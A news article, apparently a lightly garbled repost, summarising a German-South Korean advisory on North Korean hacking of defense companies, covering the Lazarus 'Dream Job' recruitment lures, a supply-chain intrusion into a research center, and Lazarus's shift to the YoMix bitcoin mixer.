New report reveals North Korean hackers are targeting defense companies worldwide

North Korean Hackers

The North Korean state-sponsored threat actors are attributed to a cyber espionage campaign targeting the defense sector around the world.

In a joint advisory published by Germany’s Federal Office for the Protection of the Constitution (BfV) and South Korea’s National Intelligence Service (NIS), the agencies said the aim of the attacks is to target advanced defense technologies in a “cost-effective” manner to plunder. .

“The regime is using military technologies to modernize and improve the performance of conventional weapons and to develop new strategic weapon systems, including ballistic missiles, reconnaissance satellites and submarines.” noted.

The infamous Lazarus Group has been blamed for one of two hacking incidents, which used social engineering to infiltrate the defense sector as part of a long-standing operation called Dream Job. The campaign has been running since August 2020 and consists of several waves.

In these attacks, threat actors create a fake profile or leverage legitimate but compromised profiles on platforms like LinkedIn to approach potential targets and build trust with them before offering lucrative job opportunities and shifting the conversation to another messaging service like WhatsApp. to start the recruitment process.


Victims are then sent coding assignments and job offer documents loaded with malware that, when launched, triggers the infection procedure to compromise their computers.

“In general, the fact that employees typically do not discuss job openings with their coworkers or employer plays into the hands of the attacker,” the agencies said.

“The LAZARUS group has changed its tools during the campaign and demonstrated more than once that it is capable of developing everything necessary to meet the situation.”

The second case involves a breach of a defense research center by the end of 2022 by launching a software supply chain attack on an unnamed company responsible for maintaining one of the research center’s web servers.

“The cyber actor further infiltrated the research facility by deploying remotely controlled malware through a patch management system (PMS) of the research center, and stole various account information from corporate portals and email content,” the BfV and NIS said.

North Korean hackers

The breach, which was carried out by another North Korea-based threat actor, occurred in five phases:

  • Hack the web server maintenance company, steal SSH credentials and gain remote access to the research center server
  • Download additional malicious tools using curl commands, including tunneling software and a Python-based downloader
  • Perform lateral moves and plunder employee account credentials
  • Leverage the stolen security manager’s account information to unsuccessfully distribute a Trojan update that comes with capabilities to upload and download files, execute code, and collect system information
  • Persist in the target environment by weaponizing a file upload vulnerability on the website by deploying a web shell for remote access and sending spear-phishing emails

“The actor avoided a direct attack on his target, which maintained a high level of security, but rather carried out an initial attack on his supplier, the maintenance and repair company,” the agencies explained. “This indicates that the actor abused the trust relationship between the two entities.”


The safety bulletin is the second in as many years to be published by BfV and NIS. In March 2023, the agencies warned about Kimsuky actors using rogue browser extensions to steal users’ Gmail inboxes. Kimsuky was sanctioned by the US government in November 2023.

The development comes as blockchain analytics firm Chainalysis revealed that Lazarus Group has switched to using the YoMix bitcoin mixer to launder stolen proceeds following the closure of Sinbad late last year, indicating they may be changing their modus operandi adjust in response to law enforcement actions.

“Sinbad became a mixer of choice for North Korea-affiliated hackers in 2022, shortly after the sanctions against Tornado Cash, which was previously the go-to for these advanced cybercriminals,” the company said. said. “With Sinbad out of the picture, Bitcoin-based mixer YoMix has acted as a replacement.”

The malicious activities are the work of a plethora of North Korean hacking units operating under the broad Lazarus umbrella, known to engage in a range of hacking operations ranging from cyber espionage to cryptocurrency theft, ransomware and supply chain attacks to achieve their strategic goals. goals.

#report #reveals #North #Korean #hackers #targeting #defense #companies #worldwide

Notify of
Inline Feedbacks
View all comments
Previous Post
Learn How to Build an Incident Response Playbook

Learn how to build an incident response playbook against dispersed spiders in real time

Next Post
WordPress Hack

Critical error affects more than 25,000 sites

Related Posts